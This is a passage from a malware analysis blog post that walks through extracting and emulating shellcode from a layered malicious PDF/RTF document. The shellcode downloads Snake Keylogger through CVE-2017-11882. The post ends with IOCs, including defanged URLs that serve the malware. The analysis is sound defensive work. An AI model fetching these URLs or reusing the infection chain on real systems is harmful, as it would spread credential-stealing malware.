Unfortunately, this fails: there is still some unresolved obfuscation. But that is not a problem, we can perform the extraction manually. For that, we locate the start of the ole file (position 0x47) and use option -c to “cut” it out of the decoded data, like this:

Figure 38: Hexadecimal/ascii dump of the embedded ole file

With option -d, we can perform a dump (binary data) of the ole file and write it to disk:

Figure 39: Writing the embedded ole file to disk
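To recap this part of the analysis, the rtfdump.py steps can be sketched in one place. Here rtf.vir is a name we pick for the downloaded RTF file, entry 2 and offset 0x47 are specific to this sample, and the cut expression syntax (0x47:) is assumed from the conventions of Didier Stevens' Suite:

```shell
if command -v rtfdump.py >/dev/null 2>&1 && [ -f rtf.vir ]; then
  rtfdump.py rtf.vir                                     # overview of entities
  rtfdump.py -s 2 -H -S rtf.vir                          # hex decode, shifted one digit
  rtfdump.py -s 2 -H -S -c 0x47: rtf.vir                 # cut out the embedded ole file
  rtfdump.py -s 2 -H -S -c 0x47: -d rtf.vir > ole.vir    # dump it to disk
else
  echo "rtfdump.py or rtf.vir not available - adjust names to your environment"
fi
```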

We use oledump to analyze the extracted ole file (ole.vir):

Figure 40: Analysis of the extracted ole file

It succeeds: it contains one stream.
Let’s select it for further analysis:

Figure 41: Content of the stream

This binary data looks random.
Let’s use option -S to extract strings (this option is like the strings command) from this binary data:

Figure 42: Extracting strings

There’s nothing recognizable here.

Let’s summarize where we are: we extracted an ole file from an RTF file that was downloaded by a .docx file embedded in a PDF file. When we say it like this, we can only think that this is malicious.

Shellcode analysis

Remember that malicious RTF files very often contain exploits? Exploits often use shellcode. Let’s see if we can find shellcode.
To achieve this, we are going to use scdbg, a shellcode emulator developed by David Zimmer.
First we are going to write the content of the stream to a file:

Figure 43: Writing the (potential) shellcode to disk
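The extraction behind this figure can be written as follows (a sketch assuming oledump.py is on the PATH and ole.vir is the file we extracted in the previous step):

```shell
if command -v oledump.py >/dev/null 2>&1 && [ -f ole.vir ]; then
  oledump.py -s 1 -d ole.vir > sc.vir   # dump stream 1 (the potential shellcode) to disk
else
  echo "oledump.py or ole.vir not available"
fi
```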

scdbg is a free, open source tool that emulates 32-bit shellcode designed to run on the Windows operating system. It started as a project running on Windows and Linux, but is now developed further for Windows only.

Figure 44: Scdbg

We download Windows binaries for scdbg:

Figure 45: Scdbg binary files

And extract executable scdbg.exe to our working directory:

Figure 46: Extracting scdbg.exe
Figure 47: Extracting scdbg.exe

Although scdbg.exe is a Windows executable, we can run it on Ubuntu via Wine:

Figure 48: Trying to use wine

Wine is not installed, but by now, we know how to install tools like this:

Figure 49: Installing wine
Figure 50: Tasting wine 😊

We can now run scdbg.exe like this:

wine scdbg.exe

scdbg requires some options: -f sc.vir provides it with the file to analyze.

Shellcode has an entry point: the address from where it starts to execute. By default, scdbg starts to emulate from address 0. Since this is an exploit (we have not yet recognized which exploit, but that does not prevent us from trying to analyze the shellcode), its entry point will not be address 0. At address 0, we should find a data structure (that we have not identified) that is exploited.
To summarize: we don’t know the entry point, but it’s important to know it.
Solution: scdbg.exe has an option to try out all possible entry points. Option -findsc.
And we add one more option to produce a report: -r.

Let’s try this:

Figure 51: Running scdbg via wine
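The full command assembled from the options discussed above, guarded so it only runs when wine, scdbg.exe and sc.vir are all present:

```shell
if command -v wine >/dev/null 2>&1 && [ -f scdbg.exe ] && [ -f sc.vir ]; then
  wine scdbg.exe -f sc.vir -findsc -r   # try all entry points, produce a report
else
  echo "wine, scdbg.exe or sc.vir missing - see the installation steps above"
fi
```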

This looks good: after a bunch of messages and warnings from Wine that we can ignore, scdbg presents us with 8 (0 through 7) possible entry points. We select the first one: 0

Figure 52: Trying entry point 0 (address 0x95)

And we are successful: scdbg.exe was able to emulate the shellcode, and show the different Windows API calls performed by the shellcode. The most important one for us analysts, is URLDownloadToFile. This tells us that the shellcode downloads a file and writes it to disk (name vbc.exe).
Notice that scdbg did emulate the shellcode: it did not actually execute the API calls, no files were downloaded or written to disk.

Although we don’t know which exploit we are dealing with, scdbg was able to find the shellcode and emulate it, providing us with an overview of the actions executed by the shellcode.
The shellcode is obfuscated: that is why we did not see strings like the URL and filename when extracting the strings (see figure 42). But by emulating the shellcode, scdbg also deobfuscates it.

We can now use curl again to try to download the file:

Figure 53: Downloading the executable

And it is indeed a Windows executable (.NET):

Figure 54: Headers
Figure 55: Running command file on the downloaded file

To determine what we are dealing with, we try to look it up on VirusTotal.
First we calculate its hash:

Figure 56: Calculating the MD5 hash
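The hashing step relies only on standard tools; here it is demonstrated on a stand-in file (sample.vir below is made up, not the real download):

```shell
printf 'MZ demo content' > sample.vir   # stand-in for the downloaded executable
md5sum sample.vir       # MD5, as used for the VirusTotal lookup
sha256sum sample.vir    # sha256, as listed in the IOCs below
```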

And then we look it up through its hash on VirusTotal:

Figure 57: VirusTotal report

From this report, we conclude that the executable is Snake Keylogger.

If the file would not be present on VirusTotal, we could upload it for analysis, provided we accept the fact that we can potentially alert the criminals that we have discovered their malware.

In the video for this blog post, there’s a small bonus at the end, where we identify the exploit: CVE-2017-11882.

This is a long blog post, not only because of the different layers of malware in this sample. But also because in this blog post, we provide more context and explanations than usual.
We explained how to install the different tools that we used.
We explained why we chose each tool, and why we execute each command.
There are many possible variations of this analysis, and other tools that can be used to achieve similar results. I, for example, would pipe more commands together.
The important aspect of static analysis like this one is to use dedicated tools. Don’t use a PDF reader to open the PDF, don’t use Office to open the Word document, … Because if you do, you might execute the malicious code.
We have seen malicious documents like this before, and written blog posts about them, like this one. The sample we analyzed here has more “layers” than these older maldocs, making the analysis more challenging.

In that blog post, we also explain how this kind of malicious document “works”, by showing the JavaScript and by opening the document inside a sandbox.


IOCs

PDF sha256: 05dc0792a89e18f5485d9127d2063b343cfd2a5d497c9b5df91dc687f9a1341d
RTF sha256: 165305d6744591b745661e93dc9feaea73ee0a8ce4dbe93fde8f76d0fc2f8c3f
EXE sha256: 20a3e59a047b8a05c7fd31b62ee57ed3510787a979a23ce1fde4996514fae803
URL: hxxps://vtaurl[.]com/IHytw
URL: hxxp://192[.]227[.]196[.]211/FRESH/fresh[.]exe

These files can be found on VirusTotal, MalwareBazaar and Malshare.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.